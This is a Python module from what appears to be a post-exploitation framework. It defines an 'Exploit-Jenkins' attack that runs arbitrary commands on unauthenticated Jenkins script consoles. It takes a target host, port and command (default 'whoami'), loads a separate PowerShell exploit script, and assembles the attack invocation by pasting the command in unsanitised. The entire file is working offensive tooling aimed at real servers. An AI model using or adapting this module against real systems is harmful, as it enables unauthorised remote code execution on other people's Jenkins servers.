95 lines
2.8 KiB
Python
95 lines
2.8 KiB
Python
import base64
|
|
from lib.common import helpers
|
|
|
|
class Module:
|
|
|
|
def __init__(self, mainMenu, params=[]):
|
|
|
|
self.info = {
|
|
'Name': 'Exploit-Jenkins',
|
|
|
|
'Author': ['@luxcupitor'],
|
|
|
|
'Description': ("Run command on unauthenticated Jenkins Script consoles."),
|
|
|
|
'Background' : True,
|
|
|
|
'OutputExtension' : None,
|
|
|
|
'NeedsAdmin' : False,
|
|
|
|
'OpsecSafe' : False,
|
|
|
|
'MinPSVersion' : '2',
|
|
|
|
'Comments': [
|
|
'Pass a command to run. If windows, you may have to prepend "cmd /c ".'
|
|
]
|
|
}
|
|
|
|
# any options needed by the module, settable during runtime
|
|
self.options = {
|
|
# format:
|
|
# value_name : {description, required, default_value}
|
|
'Agent' : {
|
|
'Description' : 'Agent to run module on.',
|
|
'Required' : True,
|
|
'Value' : ''
|
|
},
|
|
'Rhost' : {
|
|
'Description' : 'Specify the host to exploit.',
|
|
'Required' : True,
|
|
'Value' : ''
|
|
},
|
|
'Port' : {
|
|
'Description' : 'Specify the port to use.',
|
|
'Required' : True,
|
|
'Value' : '8080'
|
|
},
|
|
'Cmd' : {
|
|
'Description' : 'command to run on remote jenkins script console.',
|
|
'Required' : True,
|
|
'Value' : 'whoami'
|
|
}
|
|
}
|
|
|
|
# save off a copy of the mainMenu object to access external functionality
|
|
# like listeners/agent handlers/etc.
|
|
self.mainMenu = mainMenu
|
|
|
|
for param in params:
|
|
# parameter format is [Name, Value]
|
|
option, value = param
|
|
if option in self.options:
|
|
self.options[option]['Value'] = value
|
|
|
|
|
|
def generate(self):
|
|
|
|
# read in the common module source code
|
|
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
|
|
|
|
try:
|
|
f = open(moduleSource, 'r')
|
|
except:
|
|
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
|
|
return ""
|
|
|
|
moduleCode = f.read()
|
|
f.close()
|
|
|
|
script = moduleCode
|
|
|
|
script += "\nExploit-Jenkins"
|
|
script += " -Rhost "+str(self.options['Rhost']['Value'])
|
|
script += " -Port "+str(self.options['Port']['Value'])
|
|
command = str(self.options['Cmd']['Value'])
|
|
# if the command contains spaces, wrap it in quotes before passing to ps script
|
|
if " " in command:
|
|
script += " -Cmd \"" + command + "\""
|
|
else:
|
|
script += " -Cmd " + command
|
|
|
|
|
|
return script
|